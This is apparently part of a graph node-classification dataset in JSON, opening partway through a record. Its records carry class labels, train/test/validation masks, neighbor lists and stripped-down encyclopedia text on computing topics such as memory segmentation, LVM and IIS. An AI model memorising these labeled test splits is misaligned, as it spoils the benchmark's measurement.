      8514,
      8516,
      4424,
      330,
      8523,
      6476,
      6482,
      2391,
      344,
      6488,
      2394,
      8539,
      10590,
      8543,
      8551,
      10603,
      4465,
      376,
      8573,
      394,
      4492,
      398,
      2462,
      4513,
      421,
      4521,
      4525,
      10669,
      2479,
      2480,
      10673,
      10675,
      10676,
      2485,
      8631,
      10698,
      466,
      6614,
      8679,
      2536,
      10730,
      10731,
      4589,
      10734,
      6639,
      8687,
      499,
      4596,
      508,
      8700,
      2558,
      2560,
      6675,
      10776,
      4637,
      10781,
      4643,
      6694,
      10803,
      10809,
      2623,
      576,
      2625,
      10816,
      10828,
      2638,
      10835,
      10839,
      2653,
      6760,
      10856,
      8810,
      8815,
      6769,
      6772,
      630,
      4727,
      6774,
      8822,
      634,
      10883,
      10891,
      6797,
      8852,
      6813,
      6815,
      6818,
      6821,
      8879,
      6837,
      10933,
      8889,
      698,
      8890,
      4803,
      8902,
      10966,
      731,
      8928,
      6888,
      10985,
      8944,
      2801,
      4850,
      2804,
      757,
      2805,
      2811,
      6909,
      8965,
      778,
      6926,
      785,
      8977,
      787,
      789,
      8992,
      6950,
      4909,
      823,
      4919,
      6968,
      4925,
      6974,
      4928,
      11075,
      6988,
      9044,
      4956,
      865,
      4968,
      7020,
      2933,
      7033,
      11132,
      7039,
      7057,
      11153,
      5022,
      929,
      2980,
      9126,
      935,
      5040,
      11184,
      9142,
      9151,
      9153,
      11204,
      11205,
      3014,
      9166,
      5071,
      984,
      5090,
      995,
      7142,
      5105,
      3066,
      5115,
      1024,
      1025,
      7173,
      9224,
      3081,
      5139,
      7187,
      7189,
      5158,
      7217,
      7218,
      5176,
      7234,
      3142,
      9300,
      1109,
      11351,
      3160,
      1122,
      11363,
      3175,
      5223,
      3178,
      7285,
      9335,
      9336,
      1147,
      9340,
      3197,
      1150,
      5247,
      11390,
      3216,
      7313,
      9366,
      9370,
      7325,
      11424,
      3235,
      3241,
      9391,
      3248,
      5329,
      7382,
      9436,
      1247,
      11487,
      11489,
      1253,
      7403,
      5358,
      5363,
      9466,
      9468,
      7421,
      1278,
      3326,
      11537,
      1298,
      11539,
      5397,
      7446,
      3371,
      7477,
      7480,
      1336,
      7483,
      3394,
      7497,
      5452,
      5457,
      7505,
      7507,
      11601,
      9557,
      11604,
      7511,
      7515,
      11612,
      1376,
      7521,
      3426,
      11618,
      3429,
      5484,
      11635,
      5492,
      7540,
      1399,
      1402,
      3457,
      3470,
      7566,
      5523,
      11667,
      5531,
      11675,
      1444,
      1445,
      5546,
      9643,
      7601,
      1461,
      7605,
      1463,
      7607,
      3526,
      1480,
      1499,
      1502,
      3562,
      9707,
      5619,
      9739,
      3603,
      1556,
      7699,
      5655,
      3615,
      9762,
      3619,
      5682,
      9784,
      1593,
      5714,
      9829,
      9835,
      9839,
      5748,
      5754,
      7802,
      9854,
      1664,
      3725,
      3729,
      9882,
      1694,
      9887,
      5793,
      5798,
      7847,
      7852,
      7853,
      7858,
      9907,
      9911,
      5823,
      9926,
      5831,
      1736,
      7884,
      9932,
      5840,
      9946,
      7911,
      9964,
      1776,
      9972,
      7933,
      1791,
      1798,
      3848,
      1801,
      1804,
      7951,
      7963,
      10016,
      7983,
      5948,
      7999,
      8000,
      5956,
      1866,
      8012,
      10068,
      8032,
      1889,
      8036,
      8063,
      10113,
      8069,
      3978,
      8092,
      8100,
      4010,
      1967,
      6069,
      6075,
      4030,
      6078,
      10176,
      4034,
      4040,
      8136,
      2008,
      6128,
      10235,
      8189
    ],
    "mask": "None"
  },
  {
    "node_id": 4424,
    "label": 2,
    "text": "Memory_segmentation:memory segmentation memory segmentation computer primary memory management technique division computer primary memory segments sections computer system using segmentation reference memory location includes value identifies segment offset memory location within segment segments sections also used object files compiled programs linked together program image image loaded memory segments usually correspond natural divisions program individual routines data tables segmentation generally visible programmer paging alone different segments may created different program modules different classes memory usage code data segments certain segments may shared programs segmentation originally invented method system software could isolate different software processes tasks data using intended increase reliability systems running multiple processes simultaneously x86-64 architecture considered legacy x86-64-based modern system software n't use memory segmentation instead handle programs data utilizing memory-paging also serves way memory protection however x86-64 implementations still support backward compatibility reasons moreover segmentation user end memory management scheme system using segmentation computer memory addresses consist segment id offset within segment hardware memory management unit mmu responsible translating segment offset physical address performing checks make sure translation done reference segment offset permitted segment length set permissions example read write execute associated process allowed make reference segment type reference allowed permissions offset within segment within range specified length segment otherwise hardware exception segmentation fault raised segments may also used implement virtual memory case segment associated flag indicating whether present main memory segment accessed present main memory exception raised operating system read segment memory secondary storage segmentation one method implementing memory protection paging another combined size memory segment generally fixed may small single byte segmentation implemented several different ways different hardware without paging intel x86 memory segmentation fit either model discussed separately also greater detail separate article associated segment information indicates segment located memory— segment base program references memory location offset added segment base generate physical memory address implementation virtual memory system using segmentation without paging requires entire segments swapped back forth main memory secondary storage segment swapped operating system allocate enough contiguous free memory hold entire segment often memory fragmentation results enough contiguous memory even though may enough total instead actual memory location segment information includes address page table segment program references memory location offset translated memory address using page table segment extended simply allocating another memory page adding segment page table implementation virtual memory system using segmentation paging usually moves individual pages back forth main memory secondary storage similar paged non-segmented system pages segment located anywhere main memory need contiguous usually results reduced amount input/output primary secondary storage reduced memory fragmentation burroughs corporation b5000 computer one first implement segmentation perhaps first commercial computer provide virtual memory based segmentation later b6500 computer also implemented segmentation version architecture still use today unisys clearpath libra servers ge-645 computer modification ge-635 segmentation paging support added designed 1964 support multics intel iapx 432 begun 1975 attempted implement true segmented architecture memory protection microprocessor prime stratus apollo ibm system/38 ibm as/400 computers use memory segmentation memory segmentation used early x86 processors beginning intel 8086 provide protection program running processors access segment restrictions segment identified starting location length checking segmentation intel 80286 later provides protection introduction 80286 intel retroactively named sole operating mode previous x86 cpu models real mode introduced new protected mode protection features backward compatibility x86 cpus start real mode memory protection fixed 64 kib segments 20-bit 1024 kib addressing 80286 later processor must switched another mode software order use full address space advanced mmu features x86 implementation segmentation segment table rather pointing page table segment contains segment address linear memory address mapped physical address using separate page table unlike paged implementations segmentation prevents segments dynamically growing size x86-64 architecture use segmentation long mode 64-bit mode x86-64 architecture considered legacy x86-64-based modern system software n't use memory segmentation instead handle programs data utilizing memory-paging also serves way memory protection though x86-64 implementations still support backward compatibility reasons four segment registers cs ss ds es forced 0 limit 2 segment registers fs gs still nonzero base address allows operating systems use segments special purposes",
    "neighbors": [
      2304,
      1922,
      7939,
      8966,
      6664,
      6153,
      6921,
      4747,
      9739,
      5008,
      9490,
      11539,
      4884,
      541,
      3871,
      7071,
      1954,
      1702,
      6829,
      814,
      7983,
      5040,
      11059,
      3512,
      1593,
      3386,
      1724,
      10176,
      2625,
      1474,
      2627,
      3010,
      6084,
      9921,
      4423,
      1736,
      5065,
      6087,
      6730,
      9932,
      6221,
      11596,
      5840,
      5074,
      6868,
      86,
      7039,
      5080,
      10333,
      1247,
      8545,
      8573,
      10340,
      7269,
      6118,
      8037,
      2152,
      8551,
      7403,
      5356,
      1775,
      499,
      2804,
      5363,
      3702,
      6772,
      634,
      7421,
      5503
    ],
    "mask": "None"
  },
  {
    "node_id": 4425,
    "label": 3,
    "text": "Dragon_Knight_(video_game):dragon knight video game dragon knight ドラゴンナイト fantasy-themed eroge role-playing video game original entry dragon knight franchise originally developed published elf corporation 1989 remake created nec avenue 1995 versions released japan game adapted anime film 1991 followed dragon knight ii 1990 gameplay-wise dragon knight dungeon crawler typical era similar early wizardry games exploration combat shown first-person perspective using 2d engine combat game turn-based enemies encountered randomly similar system also used first sequel new floor mazes becomes sophisticated however helpful mini-map grid coordinates enemies getting stronger fights first game difficult unbalanced protagonist attack defend use spells items fight monsters three kingdom strawberry fields ストロベリーフィールズ place inhabited women goddess tower protected land people generations one day monstrous dragon knights corrupted evil led demon gazelbaan ゲイゼルバーン descended upon tower people strawberry fields suddenly find threatened army monsters turned goddess aquarina アクァーリナー stone captured warrior women demanding six gems source magical power goddess delivered else would kill hostages answering plea help queen luna ルナ voiced noriko hidaka young warrior traveler yamato takeru ヤマト・タケル voiced akira kamiya takes luna mother voiced rei sakuma floor tower captured females takeru rescue rapists game originally released 1989 pc88 pc98 msx followed sharp x68000 version 1990 1995 remake dragon knight graffiti pc engine developed released nec avenue two soundtracks dragon knight treasure king water chapter ドラゴンナイト～水の宝王篇～ pc engine world — dragon knight graffiti released japan datam polystar 1990 nec avenue distributed nippon columbia 1995 respectively ova anime adaptation released polystar vhs ld 1991 soft cel pictures distributed english version vhs format also re-released dvd 2003 cast included yasunori matsuno takeru yūko mizutani luna release famicom tsūshin scored pc engine remake 22 40 also giving 8 10 reader cross review information russian article square faction japanese wikipedia",
    "neighbors": [
      6696,
      8355,
      6776,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 4426,
    "label": 2,
    "text": "Brendan_Gregg:brendan gregg brendan gregg kernel performance engineer netflix known work systems performance analysis previously worked sun microsystems oracle corporation joyent gregg born newcastle new south wales attended university newcastle australia working technical instructor sun microsystems later consultant hired join sun fishworks team san francisco october 2010 left oracle position lead performance engineer joyent march 2014 became senior performance architect netflix gregg one leading experts dtrace creator dtracetoolkit author books dtrace systems performance also star shouting data center viral video november 2013 awarded lisa outstanding achievement award contributions field system administration particularly groundbreaking work systems performance analysis methodologies investigates writes linux performance new blog gregg developed various methodologies performance analysis notably use method methodology short utilization saturation errors method also created visualization types aid performance analysis including latency heat maps utilization heat maps subsecond offset heat maps flame graphs",
    "neighbors": [
      9665,
      11506,
      8671
    ],
    "mask": "Test"
  },
  {
    "node_id": 4427,
    "label": 3,
    "text": "PAC611:pac611 socket pac611 611 pin microprocessor socket designed interface intel itanium 2 processor rest computer usually via motherboard provides electrical interface well physical support socket designed support microprocessor module socket pac611 introduced intel second generation itanium 2002 supported bus speeds 200 mhz double-pumped socket pac611 processors reach speeds 1.66 ghz",
    "neighbors": [
      3588,
      5901,
      5523,
      2455,
      3992,
      8855,
      11417,
      3995,
      4252,
      6175,
      7714,
      10019,
      4523,
      2604,
      2350,
      6192,
      9649,
      4537,
      7105,
      4805,
      7110,
      8394,
      3403,
      4179,
      3798,
      4185,
      7002,
      9945,
      11484,
      7134,
      9570,
      10468,
      613,
      8552,
      1260,
      4717,
      10225,
      371,
      9592,
      8442
    ],
    "mask": "None"
  },
  {
    "node_id": 4428,
    "label": 7,
    "text": "Apttus:apttus apttus american business-to-business software provider specializing business process automation company provides calls “ middle office ” solutions utilizing artificial intelligence optimize various financial commercial functions quote-to-cash revenue management e-commerce management apttus ’ software originally developed leverage salesforce customer relationship management platform since integrated microsoft azure ibm cloud well september 2018 private equity firm thoma bravo purchased majority stake apttus resulted significant turnover executive ranks thoma bravo installed new ceo cfo chief legal officer chief people officer vice president finance corporate controller end 2018 apttus founded 2006 kirk krappe neehar giri kent perkocha three co-founders reportedly developed company ideas written napkins laundry room krappe served company ’ first ceo giri chief solutions officer perkocha chief customer officer company bootstrapped took outside funding 2013 raised 37 million series financing group investors including k1 capital iconiq salesforce time 2018 buyout apttus received total 404 million investment capital five rounds fundraising gave company valuation approximately 1.3 billion september 2016 despite publicly discussing likelihood initial public offering 2016 apttus never went public acquired thoma bravo 2015 acquisition apttus rival steelbrick salesforce early apttus investor widely blamed apttus ’ inability complete ipo find buyer favorable terms july 2018 krappe departed apttus little warning move later reported driven accusations sexual assault misrepresentations company ’ financial performance allegations became public november 1 2018 publication business insider investigative piece highlighted company sales retreat one palmilla resort near cabo san lucas mexico krappe reportedly sexually assaulted 26 year-old female business development employee allegations accused krappe presenting misleading data apttus ’ size financial health time report “ several ” sexual harassment claims underway well three lawsuits financial misrepresentation issues",
    "neighbors": [
      10090,
      1935
    ],
    "mask": "Train"
  },
  {
    "node_id": 4429,
    "label": 7,
    "text": "Infrastructure_as_a_service:infrastructure service infrastructure service iaas online services provide high-level apis used dereference various low-level details underlying network infrastructure like physical computing resources location data partitioning scaling security backup etc hypervisor xen oracle virtualbox oracle vm kvm vmware esx/esxi hyper-v lxd runs virtual machines guests pools hypervisors within cloud operational system support large numbers virtual machines ability scale services according customers varying requirements typically iaas involves use cloud orchestration technology like open stack apache cloudstack open nebula manages creation virtual machine decides hypervisor i.e physical host start enables vm migration features hosts allocates storage volumes attaches vms usage information billing lots alternative hypervisors linux containers run isolated partitions single linux kernel running directly physical hardware linux cgroups namespaces underlying linux kernel technologies used isolate secure manage containers containerisation offers higher performance virtualization hypervisor overhead also container capacity auto-scales dynamically computing load eliminates problem over-provisioning enables usage-based billing iaas clouds often offer additional resources virtual-machine disk-image library raw block storage file object storage firewalls load balancers ip addresses virtual local area networks vlans software bundles nist definition cloud computing defines infrastructure service according internet engineering task force ietf basic cloud-service model providers offering infrastructure — virtual machines resources — service subscribers iaas-cloud providers supply resources on-demand large pools equipment installed data centers wide-area connectivity customers use either internet carrier clouds dedicated virtual private networks deploy applications cloud users install operating-system images application software cloud infrastructure model cloud user patches maintains operating systems application software cloud providers typically bill iaas services utility computing basis cost reflects amount resources allocated consumed",
    "neighbors": [
      1539,
      9228,
      526,
      4623,
      10265,
      5662,
      5666,
      9766,
      39,
      5159,
      3121,
      5681,
      10820,
      4683,
      590,
      1102,
      7248,
      5202,
      4194,
      5732,
      5749,
      2170,
      7812,
      4236,
      10893,
      1678,
      2720,
      6307,
      2217,
      5295,
      9906,
      7352,
      4289,
      4802,
      3269,
      1224,
      5848,
      6367,
      3302,
      2795,
      3819,
      8439,
      3323,
      253,
      8446,
      8451,
      272,
      6929,
      2328,
      4377,
      8986,
      11038,
      6444,
      8495,
      1840,
      11070,
      8515,
      8520,
      3405,
      1362,
      6999,
      7512,
      3428,
      5994,
      10090,
      8044,
      5499,
      11646,
      6018,
      6027,
      9613,
      911,
      1935,
      8592,
      405,
      2965,
      11692,
      3502,
      9655,
      10681,
      448,
      2496,
      11201,
      1480,
      2504,
      5066,
      9675,
      9682,
      467,
      10200,
      6618,
      6622,
      6632,
      1001,
      7660,
      8191
    ],
    "mask": "None"
  },
  {
    "node_id": 4430,
    "label": 4,
    "text": "Fireblade_(company):fireblade company fireblade acquired stackpath israeli company founded 2008 provides website security traffic management software based cloud ’ two tier saas application protects websites ddos attacks data scrapping improves website health security performance fireblade founded shay rapaport erez azaria ceo cto respectively offers integration cpanel whm service offers protection ddos attacks spam scrapping cms vulnerability brute force anda reputational behavioral firewalls also offers dynamic optimization 30 points presence tier-1 cdn tools",
    "neighbors": [
      8998
    ],
    "mask": "Test"
  },
  {
    "node_id": 4431,
    "label": 6,
    "text": "Ext3cow:ext3cow ext3cow third extended filesystem copy-on-write open source versioning file system based ext3 file system versioning implemented block-level copy-on-write shares many performance characteristics ext3 ext3cow provides time-shifting interface permits real-time continuous view data past time-shifting novel interface introduced ext3cow allowing users navigate access past namespaces adding time component commands ext3cow designed platform compliance versioning auditability requirements recent us electronic record retention legislation sarbanes-oxley hipaa version ext3cow linux 2.6 kernel released march 30 2007 details ext3cow implementation found 2005 paper",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      1109,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      6808,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      6961,
      6963,
      1844,
      823,
      6970,
      11072,
      3909,
      2378,
      5969,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      7126,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 4432,
    "label": 2,
    "text": "Just_enough_operating_system:enough operating system enough operating system jeos pronounced juice paradigm customizing operating systems fit needs particular application software appliance platform includes operating system components required support particular application third-party components contained appliance e.g. kernel makes appliance smaller faster boot execute particular application potentially secure application running full general-purpose os typically jeos consist following important differentiate true fully minimalized os install profiles forced example security hardening tools representing recovery console images jeos richer install profiles designed built wider audience usage vm/va creators users easily perform needed installation configuration tasks",
    "neighbors": [
      3654,
      1032,
      6058,
      9806,
      7983,
      5363,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 4433,
    "label": 2,
    "text": "The_Unix_Programming_Environment:unix programming environment unix programming environment first published 1984 prentice hall book written brian w. kernighan rob pike bell labs considered important early document unix operating system book addresses unix philosophy small cooperating tools standardized inputs outputs kernighan pike give brief description unix design unix philosophy authors write goal book communicate unix programming philosophy book starts introduction unix beginners next goes basics file system shell reader led topics ranging use filters use c programming robust unix applications basics grep sed make awk book closes tutorial making programming language parser yacc use troff ms mm format documents preprocessors tbl eqn pic making man pages man macro set appendices cover ed editor abovementioned programming language named hoc stands high-order calculator although unix still exists decades publication book book describes already mature unix 1984 unix already development 15 years since 1969 published peer-reviewed journal 10 years earlier sosp 1974 unix timesharing system least seven official editions manuals published see version 7 unix 1984 several commercial academic variants unix already existed e.g. xenix sunos bsd unix system v hp-ux year earlier ritchie thompson prestigious turing award work unix book written unix starting already popular enough worthy book published masses new users coming retrospect 1984 early stage unix evolution respects end unix evolution least bell labs important unix variants already forked research unix earlier system v published 1983 bsd based 1979 seventh edition unix commercial unix variants based system v bsd combination eighth edition unix came right book development unix bell labs ninth tenth edition never made outside bell labs effort evolved plan 9 bell labs book written ansi c first drafted programs follow older k r style however source code available book website updated ansi c conformance technical editor ben everard linux voice magazine praised book providing relevant documentation despite 30 years old good book aspiring programmers n't know much linux",
    "neighbors": [
      6369,
      6787,
      9444,
      9507,
      10436,
      9735,
      9578,
      7983,
      11023,
      11442,
      2995,
      5492,
      8821,
      823,
      1304,
      1435,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 4434,
    "label": 8,
    "text": "Browserless_Web:browserless web browserless web communication web applications without need web browser term coined article network world referring mainly business-to-business interaction",
    "neighbors": [
      119
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4435,
    "label": 4,
    "text": "Outline_of_computer_security:outline computer security following outline provided overview topical guide computer security computer security – security applied computing devices computers smartphones well computer networks private public networks including whole internet field covers processes mechanisms digital equipment information services protected unintended unauthorized access change destruction growing importance line increasing reliance computer systems societies worldwide computer security includes measures taken ensure integrity files stored computer server well measures taken prevent unauthorized access stored data securing physical perimeter computer equipment authentication users computer accounts accessing data providing secure method data transmission computer security described following variety threats combined rapid development new threats made cyber insecurity removal information assurance 'status quo long man continues use computer man also takes interest manipulating modifying creating bypassing 'rules 'security standards common effective method violating computer security protocols phishing phishing process providing cloned login page site victim uses example google gmail user enters his/her login information data captured access victims account gained many corporations executive mid-ranking managers even low level staff many current u.s. corporations idea malicious user quietly passively intercepting communications strong motivation theft intellectual property often victims phishing either never become aware privacy breached many months pass become aware privacy lost methods computer network attack computer network exploitation social engineering frequent method attack take form phishing spear phishing corporate government world well counterfeit websites hid spoofing keylogger access control – selective restriction access place resource act accessing may mean consuming entering using permission access resource called authorization application security data security – protecting data database destructive forces unwanted actions unauthorized users independent organization evaluates rates antivirus security suite software microsoft windows android operating systems according variety criteria every month researchers publish results testing list products awarded certification organisation based magdeburg germany internet police – police secret police departments law enforcement agencies charge policing internet major purposes internet police depending state fighting cybercrime well censorship propaganda monitoring manipulating online public opinion rubber-hose cryptanalysis",
    "neighbors": [
      2049,
      4099,
      5636,
      10245,
      10756,
      7692,
      14,
      4625,
      9233,
      2580,
      3094,
      30,
      10290,
      6195,
      7222,
      11319,
      1083,
      7739,
      2110,
      1087,
      9791,
      9293,
      8283,
      10341,
      8816,
      8308,
      5749,
      5245,
      5246,
      647,
      9356,
      4242,
      4755,
      3732,
      150,
      10392,
      3742,
      2213,
      7337,
      7855,
      8368,
      2737,
      9392,
      6323,
      2228,
      3770,
      3774,
      704,
      197,
      7368,
      5325,
      10446,
      7887,
      9433,
      3290,
      6364,
      9440,
      6373,
      9963,
      7927,
      1273,
      250,
      4348,
      4863,
      1792,
      2818,
      4356,
      6916,
      8459,
      3342,
      8974,
      9486,
      9488,
      8978,
      5404,
      4895,
      1315,
      3366,
      8998,
      3880,
      3885,
      8493,
      7983,
      6964,
      823,
      5433,
      7484,
      5959,
      10070,
      5464,
      9048,
      7515,
      4956,
      1373,
      1888,
      3941,
      2409,
      877,
      4464,
      6000,
      6516,
      6519,
      3450,
      4986,
      4475,
      3473,
      7073,
      6562,
      939,
      9646,
      8632,
      3011,
      3528,
      6098,
      9684,
      9688,
      7135,
      3041,
      2534,
      11244,
      1519,
      4081,
      6648,
      2041,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 4436,
    "label": 4,
    "text": "Cherax_snowden:cherax snowden cherax snowden species crayfish west papua indonesia oinsok river drainage sawiat district chendravasikh kepala burung peninsulas wild live freshwater river tributaries popular freshwater aquarium pet across asia europe north america orange-tipped claws specimens previously misidentified members cherax holthuisi also west papua adult body length 10 cm males 7 cm females different shades green brownish-green bluish-green predominant body color throughout lives claw tips orange first samples became known west 2006 means internet pet shops time examined professional zoologists 2015 cherax snowden new species crayfish crustacea decapoda parastacidae kepala burung vogelkop peninsula irian jaya west papua indonesia already popular pet europe east asia america name orange tip scientific species description published german zoologists institute environmental sciences university koblenz-landau landau species named edward snowden honor contribution freedom speech",
    "neighbors": [
      3495
    ],
    "mask": "Test"
  },
  {
    "node_id": 4437,
    "label": 2,
    "text": "Peter_MacDonald_(computer_programmer):peter macdonald computer programmer peter macdonald canadian software engineer best known creator softlanding linux system sls widely regarded first complete linux distribution work served foundation wine also created tcl web browser browsex pdqi suite tcl utilities current projects include jsish embeddable javascript interpreter builtin type-checking peter charles macdonald born victoria british columbia june 28 1957 graduated computer science program university victoria bsc 1989 msc 1996 master thesis decomposing linux kernel dynamically loadable modules macdonald co-developed early features linux kernel early 1990s including shared libraries pseudo terminals select call virtual consoles announced softlanding linux system sls first standalone linux install testing august 1992 15 floppy disks general release october 1992 recommending least 10 mb disk space sls became popular also drew criticism macdonald criticized trying make money free software defended linus torvalds two early linux distributions made specifically reaction sls ian murdock debian compensate sls bugs patrick volkerding slackware include installer patches n't added sls macdonald would n't allow volkerding distribute independently initial 1993 wine windows emulator based tcl/tk windowing functions macdonald wrote though later rewritten direct xlib calls macdonald founded browsex systems 1999 put version 1.0 browsex open source tcl-based cross-platform web browser meant smaller faster netscape last update browsex 2003 company renamed pdq interfaces inc. put set various tcl based utilities jsish javascript interpreter builtin sqlite json websocket zvfs support",
    "neighbors": [
      1026,
      7938,
      7812,
      8326,
      4360,
      5644,
      4493,
      4367,
      912,
      657,
      8848,
      1939,
      2195,
      1813,
      2581,
      3478,
      6808,
      10642,
      7450,
      11155,
      10780,
      3229,
      1694,
      6302,
      7584,
      802,
      3618,
      5410,
      6691,
      6947,
      8354,
      10149,
      4011,
      5931,
      8364,
      9646,
      692,
      1717,
      823,
      5815,
      9660,
      2109,
      11069,
      10687,
      10817,
      10822,
      8263,
      843,
      5067,
      589,
      3791,
      6352,
      4177,
      11602,
      8147,
      8787,
      6489,
      3802,
      4831,
      1632,
      1761,
      9696,
      11232,
      4841,
      7793,
      1394,
      1396,
      3189,
      11643
    ],
    "mask": "Test"
  },
  {
    "node_id": 4438,
    "label": 6,
    "text": "Logical_volume_management:logical volume management computer storage logical volume management lvm provides method allocating space mass-storage devices flexible conventional partitioning schemes store volumes particular volume manager concatenate stripe together otherwise combine partitions block devices general larger virtual partitions administrators re-size move potentially without interrupting system use volume management represents one many forms storage virtualization implementation takes place layer device-driver stack operating system os opposed within storage devices network volume-manager implementations share basic design start physical volumes pvs either hard disks hard disk partitions logical unit numbers luns external storage device volume management treats pv composed sequence chunks called physical extents pes volume managers hp-ux linux pes uniform size others veritas variably-sized pes split merged normally pes simply map one-to-one logical extents les mirroring multiple pes map le pes drawn physical volume group pvg set same-sized pvs act similarly hard disks raid1 array pvgs usually laid reside different disks data buses maximum redundancy system pools les volume group vg pooled les concatenated together virtual disk partitions called logical volumes lvs systems use lvs raw block devices like disk partitions creating mountable file systems using swap storage striped lvs allocate successive le different pv depending size le improve performance large sequential reads bringing bear combined read-throughput multiple pvs administrators grow lvs concatenating les shrink returning les pool concatenated les contiguous allows lvs grow without move already-allocated les volume managers allow re-sizing lvs either direction online changing size lv necessarily change size file system merely changes size containing space file system resized online recommended allows system adjust storage on-the-fly without interrupting applications pvs lvs shared span different vgs although volume managers may allow moving vgs host allows administrators conveniently bring vgs online take offline move host systems single administrative unit vgs grow storage pool absorbing new pvs shrink retracting pvs may involve moving already-allocated les pv volume managers perform movement online underlying hardware hot-pluggable allows engineers upgrade replace storage without system downtime hybrid volume volume intentionally opaquely makes use two separate physical volumes instance workload may consist random seeks ssd may used permanently store frequently used recently written data using higher-capacity rotational magnetic media long-term storage rarely needed data linux bcache dm-cache may used purpose fusion drive may used os x. zfs also implements functionality file system level allowing administrators configure multi-level read/write caching hybrid volumes present similar concept hybrid drives also combine solid-state storage rotational magnetic media volume managers also implement snapshots applying copy-on-write le scheme volume manager copy le copy-on-write table written preserves old version lv snapshot may later reconstructed overlaying copy-on-write table atop current lv unless volume management supports thin provisioning discard le origin volume written permanently stored snapshot volume snapshot volume made smaller origin common practice may render snapshot inoperable snapshots useful backing self-consistent versions volatile data table files busy database rolling back large changes operating system upgrade single operation snapshots similar effect rendering storage quiescent similar shadow copy vss service microsoft windows linux-based live cds also use snapshots simulate read-write access read-only optical disc logical volumes suffer external fragmentation underlying storage devices allocate pes contiguously reduce i/o performance slow-seeking media magnetic disks rotational media volume managers use fixed-size pes however typically make pes relatively large example linux lvm uses 4 mb default order amortize cost seeks implementations solely volume management core storage linux lvm separating abstracting away volume management file system loses ability easily make storage decisions particular files directories example certain directory entire file system permanently moved faster storage file system layout underlying volume management layer need traversed example linux would needed manually determine offset file contents within file system manually extents along data related file faster storage volume file management implemented within subsystem instead implemented separate subsystems makes overall process theoretically simpler",
    "neighbors": [
      5120,
      2051,
      2693,
      5384,
      1801,
      1291,
      10382,
      3859,
      11539,
      5397,
      7702,
      1304,
      9882,
      2462,
      9762,
      935,
      7983,
      6014,
      1971,
      2870,
      2487,
      3512,
      823,
      9665,
      7106,
      10051,
      8772,
      10436,
      1990,
      1993,
      6601,
      4686,
      5840,
      1891,
      10596,
      4074,
      9455,
      5232,
      7794,
      6003,
      6771,
      7802,
      3323,
      1150,
      9343
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4439,
    "label": 8,
    "text": "Internet_Information_Services:internet information services internet information services iis formerly internet information server extensible web server created microsoft use windows nt family iis supports http http/2 https ftp ftps smtp nntp integral part windows nt family since windows nt 4.0 though may absent editions e.g windows xp home edition active default first microsoft web server research project european microsoft windows nt academic centre emwac part university edinburgh scotland distributed freeware however since emwac server unable handle volume traffic going microsoft.com microsoft forced develop web server iis almost every version iis released either alongside version microsoft windows versions iis prior 7.0 running client operating systems supported 10 simultaneous connections single website microsoft criticized vendors web server software including o'reilly associates netscape licensing early versions windows nt workstation edition os permitted ten simultaneous tcp/ip connections whereas expensive server edition otherwise additional features permitted unlimited connections bundled iis implied intended discourage consumers running alternative web server packages cheaper edition netscape wrote open letter antitrust division u.s. department justice regarding distinction product licensing asserted technical merit o'reilly showed user could remove enforced limits meant cripple nt 4.0 workstation web server two registry key changes trivial configuration file tweaking iis 6.0 higher support following authentication mechanisms iis 7.0 modular architecture modules also called extensions added removed individually modules required specific functionality installed iis 7 includes native modules part full installation modules individual features server uses process requests include following iis 7.5 includes following additional enhanced security features authentication changed slightly iis 6.0 iis 7 notably anonymous user named iusr_ machinename built-in account vista future operating systems named iusr notably iis 7 authentication mechanism isolated module installed uninstalled iis 8.0 offers new features targeted performance easier administration new features iis 8.5 several improvements related performance large-scale scenarios used commercial hosting providers microsoft cloud offerings also several added features related logging troubleshooting new features iis express lightweight 4.5–6.6 mb version iis available standalone freeware server may installed windows xp service pack 3 subsequent versions microsoft windows iis 7.5 express supports http https protocols portable stores configuration per-user basis require administrative privileges attempts avoid conflicting existing web servers machine iis express downloaded separately part webmatrix visual studio 2012 later visual studio 2010 earlier web developers developing asp.net apps used asp.net development server codenamed cassini default iis express serves local traffic iis releases new feature modules major version releases add new functionality following extensions available iis 7.5 according netcraft february 2014 iis market share sites 32.80 making second popular web server world behind apache http server 38.22 netcraft showed rising trend market share iis since 2012 14 february 2014 however w3techs shows different results according w3techs iis third used web server behind apache http server 1st place nginx furthermore shows consistently falling trend iis use since february 2013 netcraft data february 2017 indicates iis market share top million busiest sites 10.19 making third popular web server world behind apache 41.41 nginx 28.34 iis 4 iis 5 affected ca-2001-13 security vulnerability led infamous code red attack however versions 6.0 7.0 reported issues specific vulnerability iis 6.0 microsoft opted change behaviour pre-installed isapi handlers many culprits vulnerabilities 4.0 5.0 thus reducing attack surface iis addition iis 6.0 added feature called web service extensions prevents iis launching program without explicit permission administrator default iis 5.1 earlier run websites single process running context system account windows account administrative rights 6.0 request handling processes run context network service account significantly fewer privileges vulnerability feature custom code wo n't necessarily compromise entire system given sandboxed environment worker processes run iis 6.0 also contained new kernel http stack codice_1 stricter http request parser response cache static dynamic content according secunia iis 7 total six resolved vulnerabilities iis 6 total eleven vulnerabilities one still unpatched unpatched security advisory severity rating 2 5 june 2007 google study 80 million domains concluded iis market share 23 time iis servers hosted 49 world malware apache servers whose market share 66 